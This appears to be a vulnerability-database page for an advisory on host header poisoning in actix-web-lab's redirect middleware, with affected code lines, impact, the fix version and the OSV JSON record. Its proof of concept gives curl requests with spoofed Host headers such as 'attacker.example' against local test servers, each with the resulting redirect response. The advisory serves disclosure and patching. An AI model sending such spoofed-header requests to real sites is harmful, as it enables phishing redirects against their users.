GHSA-VHJ5-X93P-67JW

Vulnerability from github – Published: 2026-03-11 00:29 – Updated: 2026-03-11 00:29
VLAI
Summary
actix-web-lab has host header poisoning in redirect middleware can generate attacker-controlled absolute redirects
Details

Summary

actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.

CVE

Assigned CVE ID: CVE-2025-63762

Details

The issue is in redirect middleware paths that construct absolute URLs from req.connection_info():

  1. actix-web-lab/src/redirect_to_https.rs (around lines 119-132)
  2. let host = conn_info.host();
  3. format!("https://{hostname}{path}")

  4. format!("https://{hostname}:{port}{path}")

  5. actix-web-lab/src/redirect_to_www.rs (around lines 30-35)

  6. format!("{scheme}://www.{host}{path}")

  7. actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)

  8. format!("{scheme}://{host_no_www}{path}")

Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.

PoC

Environment used for validation: - Local minimal Actix apps using actix-web-lab middleware - RedirectHttps: http://127.0.0.1:18080 - redirect_to_www: http://127.0.0.1:18081 - redirect_to_non_www: http://127.0.0.1:18082

Reproduction (RedirectHttps):

curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test

Additional verification:

curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def

Reproduction (redirect_to_www):

curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello

Reproduction (redirect_to_non_www):

curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path

Impact

This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.

Severity
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.25.0"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "actix-web-lab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:29:17Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.\n\n### CVE\nAssigned CVE ID:  CVE-2025-63762\n\n### Details\nThe issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:\n\n1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)\n   - `let host = conn_info.host();`\n   - `format!(\"https://{hostname}{path}\")`\n   - `format!(\"https://{hostname}:{port}{path}\")`\n\n2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)\n   - `format!(\"{scheme}://www.{host}{path}\")`\n\n3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)\n   - `format!(\"{scheme}://{host_no_www}{path}\")`\n\nBecause host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.\n\n### PoC\nEnvironment used for validation:\n- Local minimal Actix apps using `actix-web-lab` middleware\n- RedirectHttps: `http://127.0.0.1:18080`\n- redirect_to_www: `http://127.0.0.1:18081`\n- redirect_to_non_www: `http://127.0.0.1:18082`\n\nReproduction (RedirectHttps):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/test\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://attacker.example/test\n```\n\nAdditional verification:\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/abc/def\" -H \"Host: evil.example:9999\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://evil.example/abc/def\n```\n\nReproduction (redirect_to_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18081/hello\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://www.attacker.example/hello\n```\n\nReproduction (redirect_to_non_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18082/path\" -H \"Host: www.attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://attacker.example/path\n```\n\n### Impact\nThis is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.",
  "id": "GHSA-vhj5-x93p-67jw",
  "modified": "2026-03-11T00:29:17Z",
  "published": "2026-03-11T00:29:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/security/advisories/GHSA-vhj5-x93p-67jw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/pull/292"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/commit/142c28b82eb59b67445a859a2a9b75e01a9964ee"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/robjtede/actix-web-lab"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "actix-web-lab has host header poisoning in redirect middleware can generate attacker-controlled absolute redirects"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.